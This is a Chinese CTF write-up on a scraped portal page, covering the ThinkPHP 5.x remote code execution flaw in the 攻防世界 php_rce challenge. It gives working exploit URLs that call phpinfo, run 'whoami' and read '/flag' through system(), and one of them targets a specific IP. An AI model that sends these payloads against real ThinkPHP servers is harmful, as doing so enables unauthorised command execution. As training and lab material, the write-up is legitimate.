CTF-攻防世界-web-php_rce(ThinkPHP5.x5.1.31,=5.0.23)

OGeek|极客世界-中国程序员成长平台 › 门户 › 编程› PHP›PHP编程经验

原作者: [db:作者] 来自: [db:来源] 收藏邀请

ThinkPHP 命令执行漏洞5.x < 5.1.31, <= 5.0.23

参考：https://www.cnblogs.com/backlion/p/10106676.html

这是一个远程代码执行漏洞，先学习vulhub复现这个漏洞的过程：

输入：http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1，可执行phpinfo：

拉到页面底部，看到ThinkPHP的版本是5.0.20：

可以执行phpinfo，那可不可以执行其他命令呢？查了一下网上的payload，如下：

输入：http://your-ip:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

返回：www-data www-data

http://220.249.52.133:49560/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 得到答案

鲜花

握手

雷人

路过

鸡蛋

该文章已有0人参与评论

请发表评论

全部评论

专题导读

More+

10-27 六六分期app的软件客服如何联系？(六六分期

11-06 可心卡盟:win10系统火狐flash插件崩溃怎么

11-06 亲亲特价:怎么删除回收站图标

11-06 济南大学虚拟社区:鲁大师节能降温的具体办

11-06 xlueops.exe:无线网络安装向导

11-06 女斗合众国:win7系统cf与主机连接不稳定怎

11-06 0xc000022-[cf烟雾头]cf怎么调烟雾头

11-06 qizideyouhuo:应用程序无法正常启动0xc0000

11-06 ipz-185:win7系统vcf文件怎么打开

11-06 傻哥蹦迪:win10系统s4怎么打开usb调试

11-06 八神浩树gtaste:回收站清空了怎么恢复

11-06 妖尾之黑色守护:win10系统电脑没有1440x900

11-06 校园至尊魔王小说:win7系统浏览网页时字体

11-06 女斗合众国:win10系统访问共享文件夹提示请

11-06 tokyo hot n0654:恢复win7系统默认字体一招

11-06 雨酷仙境:设置win7系统转移临时文件夹腾出

11-06 阿穆纳伊之杖:win7系统开始菜单在右边还原

11-06 tunespotting:win10系统火狐flash插件总是

11-06 甘尔葛分析师：计谋网站seo关键词暴涨有什

11-06 蔡贵霖: 计谋网站seo关键词暴涨有什么秘密

11-06 博益网首页:ao3网页版进入不了解决方法

11-06 漏斗子专栏: 网站数据分析小白易懂精华篇

11-06 见证双虹怎么做:win7系统开启telnet命令的

11-06 颾狐蝶蜋:系统资源不足无法完成请求的服务

11-06 国光中学校歌:提交网站到alexa查询详细步骤

11-06 西安有情天:静态网页和动态网页的区别

11-06 红木雅尚斋:外部链接构造对网站的好处

11-06 前官礼遇：防止域名劫持–增强域安全性的10

11-06 密传二转答案: 中文分词算法有哪些

11-06 金泉家园邮编:百度快照劫持的表现及应对方

php函数preg_replace()正则去除汉字发布时间：2022-07-10

PHP位运算符发布时间：2022-07-10

delphi获取网卡信息(支持多网卡)

librespeed/speedtest: Self-hosted Speedt

2022-08-30

avehtari/BDA_m_demos: Bayesian Data Anal

2022-08-17

四维彩超怎么看性别？四维看男孩女孩诀窍

2022-11-06

medfreeman/markdown-it-toc-and-anchor: m

2022-08-18

sydney0zq/covid-19-detection: The implem

2022-08-16

阅读排行榜

1 delphi获取网卡信息(支持多网卡)

delphi获取网卡信息(支持多网卡)unitLGetAdapterInfo;interfaceusesWindows,SysUtils,

阅读：1211|2022-07-18

2 librespeed/speedtest: Self-hosted Speedt

librespeed/speedtest: Self-hosted Speedtest for HTML5 and more. Easy setup, exam

阅读：1204|2022-08-30

3 avehtari/BDA_m_demos: Bayesian Data Anal

avehtari/BDA_m_demos: Bayesian Data Analysis demos for Matlab/Octave

阅读：1108|2022-08-17

4 四维彩超怎么看性别？四维看男孩女孩诀窍

女人怀孕后，为了有一个健康聪明的宝宝，经历各种体检、筛查。其实这些体检和筛查中的

阅读：925|2022-11-06

5 medfreeman/markdown-it-toc-and-anchor: m

medfreeman/markdown-it-toc-and-anchor: markdown-it plugin to add a toc and ancho

阅读：1323|2022-08-18

6 sydney0zq/covid-19-detection: The implem

sydney0zq/covid-19-detection: The implementation of A Weakly-supervised Framewor

阅读：472|2022-08-16

7 CVE-2022-1128

Inappropriate implementation in Web Share API in Google Chrome on Windows prior

阅读：641|2022-07-29

8 万里平台海口会场

万里平台海口会场，为您讲述大美海口。在大城市，工资高，人脉广，前途一片大好。但

阅读：498|2022-07-30

9 世界上哪个国家离中国最远？

离中国最远的国家是阿根廷。从太平洋直线计算，即往东线走，北京到阿根廷的布宜诺斯艾

阅读：618|2022-11-06

10 sebbrudzinski/Open-LaTeX-Studio: Open So

sebbrudzinski/Open-LaTeX-Studio: Open Source LaTeX editor that supports remote c

阅读：539|2022-08-13

客服电话

电子邮件

CTF-攻防世界-web-php_rce(ThinkPHP5.x5.1.31,=5.0.23)

请发表评论

全部评论

上一篇：

下一篇：

CVE-2022-35360

GitbookIO/gitbook:

juleswhite/mobile-cloud-asgn1

kyamagu/matlab-json: Use official API: h

墙壁眼睛膝盖

delphi获取网卡信息(支持多网卡)

librespeed/speedtest: Self-hosted Speedt

avehtari/BDA_m_demos: Bayesian Data Anal

四维彩超怎么看性别？四维看男孩女孩诀窍

medfreeman/markdown-it-toc-and-anchor: m

sydney0zq/covid-19-detection: The implem

关于我们

产品与服务

解决方案

139-2527-9053